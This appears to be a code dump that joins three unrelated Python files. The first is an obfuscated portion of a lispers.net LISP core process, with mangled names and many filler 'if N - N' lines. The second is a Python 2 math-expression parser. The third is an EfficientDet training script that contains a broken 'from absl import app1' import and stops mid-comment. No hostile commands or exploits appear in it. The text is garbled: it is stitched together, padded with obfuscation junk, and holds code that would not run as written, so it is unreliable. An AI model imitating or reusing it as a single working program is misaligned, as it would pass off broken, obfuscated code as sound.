if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
def o00OIIIIIiiI():
    """Thread entry point that only installs the lisp exception hook."""
    lisp.lisp_set_exception()
if 79 - 79: i1IIi . oO0o
if 34 - 34: I1Ii111 * II111iiii
if 71 - 71: IiII
if 97 - 97: I1ii11iIi11i
if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
if 28 - 28: i11iIiiIii
if 51 - 51: I1IiiI + ooOoO0o * O0 . Ii1I
def O00Oo00OOoO0(lisp_socket):
    """Poll once a second for lispers.net component processes coming up or
    going down, and replay configuration to a process when it (re)starts."""
    lisp.lisp_set_exception()

    status = {"lisp-itr": False, "lisp-etr": False, "lisp-rtr": False,
              "lisp-mr": False, "lisp-ms": False, "lisp-ddt": False}

    while True:
        time.sleep(1)

        previous = status
        status = {}
        for name in previous:
            status[name] = lisp.lisp_is_running(name)
            if previous[name] == status[name]: continue

            lisp.lprint("*** Process '{}' has {} ***".format(name,
                "come up" if status[name] else "gone down"))

            # A newly started process needs its configuration pushed.
            if status[name] == True:
                lisp.lisp_ipc_lock.acquire()
                lispconfig.lisp_send_commands(lisp_socket, name)
                lisp.lisp_ipc_lock.release()
    return
if 55 - 55: oO0o . I1Ii111 * I1Ii111
if 82 - 82: I1IiiI % OoO0O00 % I11i + I11i
if 6 - 6: Oo0Ooo
if 73 - 73: I1Ii111 * I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo . I11i
if 93 - 93: i11iIiiIii
if 80 - 80: i1IIi . I1IiiI - oO0o + OOooOOo + iII111i % oO0o
if 13 - 13: II111iiii / OoOoOO00 / OoOoOO00 + ooOoO0o
def Ii1i():
    """Once a minute, remove NAT info-source state by address and nonce."""
    lisp.lisp_set_exception()
    interval = 60

    while True:
        time.sleep(interval)

        removals = []
        now = lisp.lisp_get_timestamp()

        for key in lisp.lisp_info_sources_by_address:
            info_source = lisp.lisp_info_sources_by_address[key]
            if info_source.no_timeout: continue
            # NOTE(review): this keeps entries whose uptime is *older* than
            # one interval and removes the recent ones — polarity preserved
            # from the original; confirm intended behavior.
            if info_source.uptime + interval < now: continue

            removals.append(key)

            # Also drop the nonce index entry, when one exists.
            nonce = info_source.nonce
            if nonce == None: continue
            if nonce in lisp.lisp_info_sources_by_nonce:
                lisp.lisp_info_sources_by_nonce.pop(nonce)

        # Mutate the address table only after iteration is complete.
        for key in removals:
            lisp.lisp_info_sources_by_address.pop(key)
    return
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
if 3 - 3: I1ii11iIi11i * I11i
if 53 - 53: iIii1I11I1II1 / iII111i % OoO0O00 + IiII / ooOoO0o
def oo00oO(lisp_ipc_control_socket, lisp_sockets):
    """Receive "control-packet" IPC messages from other lispers.net
    processes and transmit them on the network (or loop them back)."""
    lisp.lisp_set_exception()

    while True:
        try: received = lisp_ipc_control_socket.recvfrom(9000)
        except: return(["", "", "", ""])

        fields = received[0].split("@")
        source = received[1]

        opcode = fields[0]
        dest = fields[1]
        port = int(fields[2])
        payload = fields[3::]

        # The payload may itself contain "@"; re-join when it was split.
        if len(payload) > 1:
            payload = lisp.lisp_bit_stuff(payload)
        else:
            payload = payload[0]

        if opcode != "control-packet":
            # (sic: missing space preserved from the original message)
            lisp.lprint("lisp_core_control_packet_process() receivedunexpected control-packet, message ignored")
            continue

        lisp.lprint("{} {} bytes from {}, dest/port: {}/{}, control-packet: {}".format(
            lisp.bold("Receive", False), len(payload), source, dest, port,
            lisp.lisp_format_packet(payload)))

        # A Map-Reply whose nonce matches a NAT info-source is handed to
        # the local dispatcher for proxying.
        header = lisp.lisp_control_header()
        header.decode(payload)
        if header.type == lisp.LISP_MAP_REPLY:
            map_reply = lisp.lisp_map_reply()
            map_reply.decode(payload)
            if iiIIIIiI111(None, 0, map_reply.nonce):
                oooO0o(lisp_sockets, source, port, payload)
                continue

        # Map-Notify from the ETR is looped back to the ITR over IPC.
        if header.type == lisp.LISP_MAP_NOTIFY and source == "lisp-etr":
            ipc = lisp.lisp_packet_ipc(payload, source, port)
            lisp.lisp_ipc(ipc, Oo, "lisp-itr")
            continue

        # Build an IPv6-mapped destination address for lisp_send().
        # NOTE(review): the first assignment's result is immediately
        # overwritten in the original; the call is kept for any side effects.
        addr = lisp.lisp_convert_4to6(dest)
        addr = lisp.lisp_address(lisp.LISP_AFI_IPV6, "", 128, 0)
        if addr.is_ipv4_string(dest): dest = "::ffff:" + dest
        addr.store_address(dest)

        lisp.lisp_send(lisp_sockets, addr, port, payload)
    return
if 28 - 28: Ii1I . I1ii11iIi11i
if 77 - 77: I1ii11iIi11i % II111iiii
if 81 - 81: OoOoOO00 % Ii1I / O0 * iIii1I11I1II1 % IiII . I1IiiI
if 90 - 90: o0oOOo0O0Ooo
if 44 - 44: o0oOOo0O0Ooo / I1ii11iIi11i . Oo0Ooo + OoOoOO00
if 32 - 32: IiII - ooOoO0o * iII111i * I11i
if 84 - 84: Ii1I + I1ii11iIi11i % I1IiiI + i11iIiiIii
if 37 - 37: I11i % I1ii11iIi11i / ooOoO0o
def iI11I():
    """Create ./lisp.config from ./lisp.config.example.

    Copies lines up to and including the first "#---...---#" banner
    separator line, then stops.

    Bug fix: the original indexed line[0]/line[-1] before checking the
    line's length, so a blank line ahead of the separator raised
    IndexError; the length test now comes first.
    """
    with open("./lisp.config.example", "r") as example_file:
        lines = example_file.read().split("\n")

    with open("./lisp.config", "w") as config_file:
        for line in lines:
            config_file.write(line + "\n")
            # Separator is "#" + dashes + "#"; check length before indexing.
            if (len(line) >= 4 and line[0] == "#" and line[-1] == "#"):
                interior = line[1:-2]
                if (interior == len(interior) * "-"): break
    return
if 26 - 26: iII111i * I1Ii111 * oO0o * OoOoOO00
if 48 - 48: iII111i % i11iIiiIii . OoooooooOO * IiII % OoO0O00 . iII111i
if 6 - 6: O0 . ooOoO0o - oO0o / i11iIiiIii
if 84 - 84: I11i / I1ii11iIi11i * o0oOOo0O0Ooo * OoO0O00 * OOooOOo * O0
if 83 - 83: O0 % II111iiii + o0oOOo0O0Ooo / OoooooooOO
if 75 - 75: II111iiii . I1IiiI + OOooOOo - OoOoOO00 - O0 . I11i
if 19 - 19: Ii1I * i1IIi % O0 + I11i
if 25 - 25: I1Ii111 - Ii1I / O0 . OoooooooOO % I1IiiI . i1IIi
def Ii1iIIII1i(bottle_port):
    """Start up the lisp-core process.

    Opens the control (4342), data (4341) and IPC sockets, bootstraps
    ./lisp.config if missing, and spawns the worker threads. Returns True
    on success, False when no local addresses can be determined.
    """
    global Oo0o
    global Ii1iI
    global Oo
    global I1Ii11I1Ii1i
    global Ooo
    global o0oOoO00o

    lisp.lisp_i_am("core")
    lisp.lisp_set_exception()
    lisp.lisp_print_banner("core-process starting up")

    lisp.lisp_uptime = lisp.lisp_get_timestamp()
    lisp.lisp_version = commands.getoutput("cat lisp-version.txt")
    Oo0o = commands.getoutput("cat lisp-build-date.txt")

    if lisp.lisp_get_local_addresses() == False: return(False)

    # Lock serializing configuration IPC across processes.
    lisp.lisp_ipc_lock = multiprocessing.Lock()

    # A "+" suffix marks a source-tree (non-packaged) build.
    if os.path.exists("lisp.py"): lisp.lisp_version += "+"

    # Bind the control listen socket; honor LISP_ANYCAST_MR when an RLOC
    # is available.
    bind_address = "0.0.0.0" if lisp.lisp_is_raspbian() else "0::0"
    if os.getenv("LISP_ANYCAST_MR") == None or lisp.lisp_myrlocs[0] == None:
        Ii1iI = lisp.lisp_open_listen_socket(bind_address,
                                             str(lisp.LISP_CTRL_PORT))
    else:
        bind_address = lisp.lisp_myrlocs[0].print_address_no_iid()
        Ii1iI = lisp.lisp_open_listen_socket(bind_address,
                                             str(lisp.LISP_CTRL_PORT))

    lisp.lprint("Listen on {}, port 4342".format(bind_address))

    # Only open the data port when no external data plane handles it.
    if lisp.lisp_external_data_plane() == False:
        o0oOoO00o = lisp.lisp_open_listen_socket(bind_address,
                                                 str(lisp.LISP_DATA_PORT))
        lisp.lprint("Listen on {}, port 4341".format(bind_address))

    Oo = lisp.lisp_open_send_socket("lisp-core", "")
    Oo.settimeout(3)

    I1Ii11I1Ii1i = lisp.lisp_open_listen_socket("", "lisp-core-pkt")

    # [v4-ish slot, v6-ish slot, IPC socket] — both network slots use the
    # same listen socket here.
    Ooo = [Ii1iI, Ii1iI, Oo]

    threading.Thread(target=oo00oO, args=[I1Ii11I1Ii1i, Ooo]).start()

    # Bootstrap a configuration file on first run.
    if os.path.exists("./lisp.config") == False:
        lisp.lprint("./lisp.config does not exist, creating a copy from lisp.config.example")
        iI11I()

    # Join decentralized-push multicast groups, when configured.
    i11ii(Ii1iI)

    threading.Thread(target=lispconfig.lisp_config_process, args=[Oo]).start()
    threading.Thread(target=oOooOoOOo0O, args=[bottle_port]).start()
    threading.Thread(target=o00OIIIIIiiI, args=[]).start()
    threading.Thread(target=O00Oo00OOoO0, args=[Oo]).start()
    threading.Thread(target=Ii1i).start()
    return(True)
if 46 - 46: Ii1I
if 61 - 61: o0oOOo0O0Ooo / ooOoO0o - II111iiii
if 87 - 87: I1ii11iIi11i / I1IiiI
if 45 - 45: OoOoOO00 * ooOoO0o / OoooooooOO + OoO0O00 . I1Ii111 / OoO0O00
if 64 - 64: Ii1I / i1IIi % I1IiiI - o0oOOo0O0Ooo
if 11 - 11: I1ii11iIi11i - OoooooooOO
if 16 - 16: IiII % OoooooooOO - ooOoO0o * Ii1I - Ii1I
def I1iiII1():
    """Close every lisp-core socket during shutdown."""
    # Same order as the original: IPC send, IPC listen, control listen,
    # then data listen.
    # NOTE(review): o0oOoO00o is only opened when no external data plane is
    # configured — confirm it is always bound by the time this runs.
    for sock, ipc_name in ((Oo, "lisp-core"),
                           (I1Ii11I1Ii1i, "lisp-core-pkt"),
                           (Ii1iI, ""),
                           (o0oOoO00o, "")):
        lisp.lisp_close_socket(sock, ipc_name)
if 49 - 49: Oo0Ooo - iIii1I11I1II1
if 64 - 64: I1Ii111 + iIii1I11I1II1
if 14 - 14: Ii1I / OoooooooOO + II111iiii . O0 / i1IIi
if 58 - 58: o0oOOo0O0Ooo / i11iIiiIii / O0 % I11i % I1IiiI
if 86 - 86: IiII + OoOoOO00 / I1IiiI + I11i % I11i / i11iIiiIii
if 12 - 12: OoOoOO00 + o0oOOo0O0Ooo . I1Ii111
if 52 - 52: OoO0O00
if 4 - 4: Ii1I % I1ii11iIi11i + I11i - I1ii11iIi11i
if 98 - 98: Ii1I - O0 * oO0o * Ii1I * Ii1I
if 44 - 44: IiII + I11i
if 66 - 66: oO0o
if 34 - 34: iII111i % i11iIiiIii + i11iIiiIii - iII111i
def i11ii(lisp_socket):
    """Join multicast groups for decentralized-push xTR operation.

    Scans ./lisp.config; when "decentralized-push-xtr = yes" is configured,
    collects every map-server address in the 224/4 multicast range and
    joins those groups on lisp_socket via eth0's inet address.

    Bug fix: the original guarded the join loop with ``oOOOO == []`` where
    ``oOOOO`` was the last parsed address *string* — unbound (NameError)
    when no "address = " line existed, and never equal to ``[]`` otherwise.
    The guard now tests the collected list itself.
    """
    with open("./lisp.config", "r") as config_file:
        lines = config_file.read().split("\n")

    # Pass 1: is decentralized-push-xtr enabled at all?
    enabled = False
    for line in lines:
        # NOTE(review): these slice comparisons can never be True (a
        # length-1 slice can't equal a 2-char string); preserved verbatim
        # from the original.
        if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
        if (line == "" or line[0] == "#"): continue
        if (line.find("decentralized-push-xtr = yes") == -1): continue
        enabled = True
        break

    if enabled == False: return

    # Pass 2: collect multicast (224.0.0.0/4) map-server addresses.
    mc_groups = []
    in_ms_clause = False
    for line in lines:
        if (line[0:1] == "#-" and line[-2:-1] == "-#"): break
        if (line == "" or line[0] == "#"): continue

        if (line.find("lisp map-server") != -1):
            in_ms_clause = True
            continue
        if (line[0] == "}"):
            in_ms_clause = False
            continue

        if (in_ms_clause and line.find("address = ") != -1):
            address = line.split("address = ")[1]
            first_octet = int(address.split(".")[0])
            if (first_octet >= 224 and first_octet < 240):
                mc_groups.append(address)

    # Fixed guard: nothing to join.
    if (mc_groups == []): return

    # Determine the local interface address used for the membership.
    inet_line = commands.getoutput('ifconfig eth0 | egrep "inet "')
    if (inet_line == ""): return
    local_address = inet_line.split()[1]

    local_bytes = socket.inet_aton(local_address)
    for group in mc_groups:
        lisp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF,
                               local_bytes)
        membership = socket.inet_aton(group) + local_bytes
        lisp_socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,
                               membership)
        lisp.lprint("Setting multicast listen socket for group {}".format(group))
    return
if 60 - 60: OOooOOo * ooOoO0o * OoO0O00
if 64 - 64: I11i / II111iiii / OoO0O00 - ooOoO0o * iIii1I11I1II1 . iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
# ---------------------------------------------------------------------------
# Main: start the lisp-core process, then receive control packets on port
# 4342 and dispatch them until the listen socket is closed.
# ---------------------------------------------------------------------------
III1I11II11I = int(sys.argv[1]) if (len(sys.argv) > 1) else 8080

if Ii1iIIII1i(III1I11II11I) == False:
    lisp.lprint("lisp_core_startup() failed")
    lisp.lisp_print_banner("lisp-core abnormal exit")
    exit(1)

while True:
    iIii, ooo0O, oOoO0o00OO0, Oo000 = lisp.lisp_receive(Ii1iI, False)
    if ooo0O == "": break  # socket closed — shut down

    ooo0O = lisp.lisp_convert_6to4(ooo0O)
    oooO0o(Ooo, ooo0O, oOoO0o00OO0, Oo000)

I1iiII1()
lisp.lisp_print_banner("lisp-core normal exit")
exit(0)
if 61 - 61: iIii1I11I1II1 + oO0o * I11i - i1IIi % oO0o
if 76 - 76: oO0o / OoOoOO00
# dd678faae9ac167bc83abf78e5cb2f3f0688d3a3
|
MathExpression.py | import operator
import numpy as np
import math
import re
import functools
from threading import Thread
def forceReversible(func):
    """Tries reversing the arguments of the two argument function func if the original raises a TypeError"""
    @functools.wraps(func)
    def wrapper(arg0, arg1):
        # Debug trace of both operands (Python 2 print statement).
        print "Arg 0: %s\nArg 1: %s" % (str(arg0), str(arg1))
        try:
            return func(arg0, arg1)
        except TypeError:
            # Retry with swapped operands — useful when only one operand
            # order is supported by the underlying operator.
            return func(arg1, arg0)
    return wrapper
class MathExpression:
"""A parser for mathematical expressions. Does not depend on any other modules in dataManipulation.
Allows the specification of a list of operators which are used to break down a string, and which are assigned to a
function which takes exactly two arguments through an OrderedDict. Interpretation is done on *every* part of the
expression, thus making it impossible to execute arbitrary code. In order to maintain "safety," the input must
be a single string. Parsing is completed in groups of 3 in the format token + operator + token. This is done
iteratively. Expressions are recursively broken into sub-expressions through
the use of matching parenthesis, and evaluated from the inside out.
Function calls are evaluated in the format func(arg0, arg1...). Kwargs are not supported. A
backup function in the format backup(func, *args) can be specified to handle arguments which are passed to a
function but are of improper type; for instance, using only the first index of an array as arguments
for certain functions, etc.
"""
__author__ = "Thomas Schweich"
    @staticmethod
    def returnDict(key, value):
        """Return a single-entry dict mapping key to value."""
        return {key: value}
'''
operators = collections.OrderedDict(
(("(", None), (")", None), (",", None), ("^", forceReversible(operator.pow)), ("/", forceReversible(operator.div)),
("*", forceReversible(operator.mul)), ("+", forceReversible(operator.add)), ("-", forceReversible(operator.sub))))
'''
operators = [{"(": None, ")": None, ",": None}, {"^": forceReversible(operator.pow)},
{"/": forceReversible(operator.div), "*": forceReversible(operator.mul)},
{"+": forceReversible(operator.add), "-": forceReversible(operator.sub)}]
modules = (np, math)
    def __init__(self, expression, variables=None, operators=operators, modules=modules, fallbackFunc=None):
        """Tokenize *expression* (a string); evaluation happens later via evaluate().

        variables: mapping of names to substitution values.
        operators: precedence groups (defaults to MathExpression.operators).
        modules: modules searched for function/constant names.
        fallbackFunc: backup(func, *args) tried when func(*args) raises.
        """
        self.variables = variables if variables is not None else {}
        self.operators = operators if operators is not None else MathExpression.operators
        self.modules = modules if modules is not None else MathExpression.modules
        self.fallbackFunc = fallbackFunc
        # Token list produced by genFromString(); evaluate() replaces it
        # with the reduced result.
        self.expression = self.genFromString(expression)
        self.loops = 0  # iteration counter incremented in evaluateExpression
        self.result = None  # result placeholder — not set in this chunk
    def genFromString(self, string):
        """Separates string by .operators using regex"""
        # operators = self.operators.keys()
        operators = [o for d in self.operators for o in d.keys()] # o: operator, d: dict
        # Longest operators first so multi-character operators match greedily.
        operators.sort(key=lambda x: -len(x))
        # Tokens: <...> bracketed groups, any operator, or runs of word
        # characters and dots (numbers, names, dotted attribute paths).
        exp = re.findall(r'<.*?>|' + "|".join(["%s" % re.escape(op) for op in operators]) + '|[\.\w]+', string)
        print exp
        return exp
def getEvaluationThread(self):
"""Returns a Thread who's target is evaluate() which can be started and joined at your leisure"""
return Thread(target=self.evaluate())
    def evaluate(self):
        """Calls evaluateExpression() on .expression"""
        # Replaces the token list with the fully reduced result, in place.
        self.expression = self.evaluateExpression(self.expression)
    def evaluateExpression(self, exp):
        """Recursively evaluates expressions starting with innermost parenthesis, working outwards
        Iteratively solves sub-expressions (grouped by parenthesis) in the order of .operators

        :param exp: token list (or an already-reduced scalar/array value)
        :return: the fully reduced value once fewer than 3 tokens remain
        :raises MathExpression.ParseFailure: when a function call or operator
            application fails
        :raises MathExpression.SyntaxError: on malformed sub-expressions
        """
        # Fewer than 3 tokens cannot form "token operator token"; non-sized
        # values (already-computed results) also fall through to the base case.
        try:
            isCompleteExp = len(exp) >= 3
        except TypeError:
            isCompleteExp = False
        if isCompleteExp:
            print "-New Starting expression: %s" % str(exp)
            # Innermost group: first ")" and the "(" closest before it.
            rightInner = exp.index(")") if ")" in exp else len(exp)
            print "Right inner parenthesis index: %d" % rightInner
            leftSide = exp[:rightInner]
            leftInner = len(leftSide) - leftSide[::-1].index("(") if "(" in leftSide else 0
            print "Left inner parenthesis index: %d" % leftInner
            subExp = leftSide[leftInner:]
            print "Sub Expression: " + str(subExp)
            # Token two places left of "(" is a candidate function name.
            callerIndex = leftInner - 2
            allOps = [o for d in self.operators for o in d.keys()]
            if callerIndex > -1 and exp[callerIndex] not in allOps:
                print "Calling function...."
                # Call function if in format something(arg0, arg1...) if "something" is not an operator
                args = []
                # Each comma-separated argument is evaluated recursively.
                while "," in subExp:
                    args.append(self.evaluateExpression(list(subExp[:subExp.index(",")])))
                    del subExp[:subExp.index(",") + 1]
                args.append(self.evaluateExpression(subExp))
                # kwargs = {}
                '''
                for i, arg in enumerate(args):
                    if isinstance(arg, dict):
                        kwargs.update(args.pop(i))
                '''
                print "Arguments: " + str(args)
                # print "Kwargs: " + str(kwargs)
                funcToCall = self._interpret(exp[callerIndex])
                # NOTE(review): bare except — any failure (wrong arg types,
                # etc.) is retried through fallbackFunc before giving up.
                try:
                    result = funcToCall(*args) # , **kwargs)
                except:
                    try:
                        result = self.fallbackFunc(funcToCall, *args)
                    except Exception as e:
                        raise MathExpression.ParseFailure(str(funcToCall), e)
                print "Result: " + str(result)
                # Splice the result over "name ( args )" in the token list.
                del exp[callerIndex:rightInner + 1]
                exp.insert(callerIndex, result)
                print "Expression after replacement" + str(exp)
                print "....call complete"
            else:
                print "Evaluating expression...."
                # Otherwise, evaluate the expression within the parenthesis, replacing the range with the result
                newExp = subExp[:]
                # One pass per precedence level, highest first.
                for order in self.operators:
                    for index, part in enumerate(subExp):
                        self.loops += 1
                        if part in order.keys(): # Changing to allow for equal level operators ## ch
                            newLocation = newExp.index(part)
                            prevIndex = newLocation - 1
                            nextIndex = newLocation + 1
                            try:
                                prev = self._interpret(newExp[prevIndex])
                                nxt = self._interpret(newExp[nextIndex])
                            except IndexError as i:
                                raise MathExpression.ParseFailure(part, i)
                            print "Combining %s with %s using '%s' operator" % (str(prev), str(nxt), str(part))
                            if not (isinstance(prev, np.ndarray) and not isinstance(nxt, np.ndarray)):
                                # Call the function stored in this order's dict under the operator
                                solution = order[part](prev, nxt)
                            else:
                                raise MathExpression.SyntaxError(prev)
                            print "Solution: " + str(solution)
                            del newExp[prevIndex:nextIndex + 1]
                            newExp.insert(prevIndex, solution)
                            print "After replacement with solution: " + str(newExp)
                try:
                    hasParens = exp[leftInner - 1] == "(" and exp[rightInner] == ")"
                except IndexError:
                    raise MathExpression.SyntaxError(exp)
                if len(newExp) == 1:
                    if hasParens:
                        print "Replacing parenthesis and expression"
                        del exp[leftInner - 1:rightInner + 1]
                    else:
                        print "Replacing expression only (parenthesis not found)"
                        del exp[leftInner:rightInner]
                    exp.insert(leftInner-1, newExp[0])
                else:
                    raise MathExpression.SyntaxError(newExp)
                print "New Expression: %s" % str(exp)
                print "....evaluate complete"
            print "Length of expression: %d" % len(exp)
            return self.evaluateExpression(exp)
        else:
            # Base case: a bare value, a single remaining token, or an error.
            if not isinstance(exp, list):
                print "Loops: %d" % self.loops
                self.loops = 0
                return exp
            elif len(exp) == 1:
                return self._interpret(exp[0])
            else:
                raise MathExpression.SyntaxError(exp)
    def _interpret(self, string):
        """Resolve one token to a value.

        Resolution order for strings: "<name>" variable lookup, float literal,
        then an attribute of each module in .modules. Non-strings (already
        computed values) pass through unchanged.

        :raises MathExpression.ParseFailure: unknown <variable> token
        :raises MathExpression.SyntaxError: token not resolvable at all
        """
        if isinstance(string, str):
            if string[0] == "<" and string[-1] == ">":
                varString = string[1:-1]
                try:
                    print "Trying interpret %s as variable" % varString
                    return self.variables[varString]
                except KeyError as k:
                    raise MathExpression.ParseFailure(string, k)
            else:
                try:
                    print "Trying interpret %s as float" % string
                    return float(string)
                except ValueError:
                    pass
                for module in self.modules:
                    try:
                        print "Trying interpret %s as %s" % (string, str(module))
                        return getattr(module, string)
                    except AttributeError:
                        pass
                raise MathExpression.SyntaxError(string)
                # return string
        else:
            return string
'''
def operate(self, operator_, *args):
# TODO Dict kwargs
kwargs = [self._interpret(arg) for arg in args if isinstance(arg, dict)]
args = [self._interpret(arg) for arg in args if not isinstance(arg, dict)]
return operator_(*args, **kwargs)
'''
class ParseFailure(Exception):
"""Represents the expression group (i.e. token + operator + token) and the given exception"""
def __init__(self, badPart, exception):
self.badPart = badPart
self.exception = exception
def __repr__(self):
custom = ""
if self.exception is AttributeError:
custom += "'%s' not found in namespace. \n" % str(self.badPart)
if self.badPart in MathExpression.operators:
custom += "It is likely that the operator was missing an argument. "
return "%s threw error: %s. %s" % (str(self.badPart), str(self.exception), custom)
def __str__(self):
return str(self.__repr__())
class SyntaxError(Exception):
"""Represents only the expression group (i.e. token + operator + token)"""
def __init__(self, badPart):
self.badPart = badPart
def __repr__(self):
custom = ""
if "(" in self.badPart or ")" in self.badPart:
custom += "It is likely that you are missing a parenthesis."
return "Syntax error on sub expression: %s. \n%s" % (str(self.badPart), custom)
def __str__(self):
return str(self.__repr__())
def limit(max_=None):
    """Return decorator that limits allowed returned values.

    :param max_: maximum allowed abs() of the wrapped function's result;
        ``None`` (the default) disables the check entirely.
    """
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            ret = func(*args, **kwargs)
            try:
                mag = abs(ret)
            except TypeError:
                pass  # abs() not applicable to this return type
            else:
                # Bug fix: with the default max_=None the original compared
                # ``mag > None``, which raises TypeError on Python 3.
                if max_ is not None and mag > max_:
                    raise ValueError(ret)
            return ret
        return wrapper
    return decorator
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
from absl import app1
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
# Command-line flags.
# Cloud TPU / GCP connection flags.
flags.DEFINE_string(
    'tpu',
    default=None,
    help='The Cloud TPU to use for training. This should be either the name '
    'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
    'url.')
flags.DEFINE_string(
    'gcp_project',
    default=None,
    help='Project name for the Cloud TPU-enabled project. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
    'tpu_zone',
    default=None,
    help='GCE zone where the Cloud TPU is located in. If not specified, we '
    'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
                  'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
    'use_xla', False,
    'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
    'and this flag has no effect.')
# Model / checkpoint flags.
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
    'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
    'initialization.')
flags.DEFINE_string('ckpt', None,
                    'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
    'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
    ' containing attributes to use as hyperparameters.')
# TPU core / spatial-partitioning flags.
flags.DEFINE_integer(
    'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
    'num_cores_per_replica',
    default=2,
    help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
    'input_partition_dims', [1, 2, 1, 1],
    'A list that describes the partition dims for all the tensors.')
# Input pipeline / schedule flags.
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
                     'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
                     'Number of iterations per checkpoint save')
flags.DEFINE_string(
    'training_file_pattern', None,
    'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
                    'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
    'val_json_file', None,
    'COCO validation JSON containing golden bounding boxes. If None, use the '
    'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
                    'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
                     'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
                    'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
                  'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
    'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
    ' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
                     'Minimum seconds between evaluations.')
flags.DEFINE_integer(
    'eval_timeout', None,
    'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
    'run_epoch_in_child_process', True,
    'This option helps to rectify CPU memory leak. If True, every epoch is '
    'run in a separate process for train and eval and memory will be cleared.'
    'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
  """Build estimator(s) from flags/hparams and run train / eval / both."""
  if FLAGS.strategy == 'tpu':
    tf.disable_eager_execution()
    tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
    tpu_grpc_url = tpu_cluster_resolver.get_master()
    tf.Session.reset(tpu_grpc_url)
  else:
    # Always enable auto mixed precision graph rewrite
    os.environ['TF_AUTO_MIXED_PRECISION_GRAPH_REWRITE_IGNORE_PERFORMANCE'] = '1'
    tpu_cluster_resolver = None
  # Check data path
  if FLAGS.mode in ('train', 'train_and_eval'):
    if FLAGS.training_file_pattern is None:
      raise RuntimeError('Must specify --training_file_pattern for train.')
  if FLAGS.mode in ('eval', 'train_and_eval'):
    if FLAGS.validation_file_pattern is None:
      raise RuntimeError('Must specify --validation_file_pattern for eval.')
  # Parse and override hparams
  config = hparams_config.get_detection_config(FLAGS.model_name)
  config.override(FLAGS.hparams)
  if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
    config.num_epochs = FLAGS.num_epochs
  # Parse image size in case it is in string format.
  config.image_size = utils.parse_image_size(config.image_size)
  # The following is for spatial partitioning. `features` has one tensor while
  # `labels` has 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
  # partition is performed on `features` and all partitionable tensors of
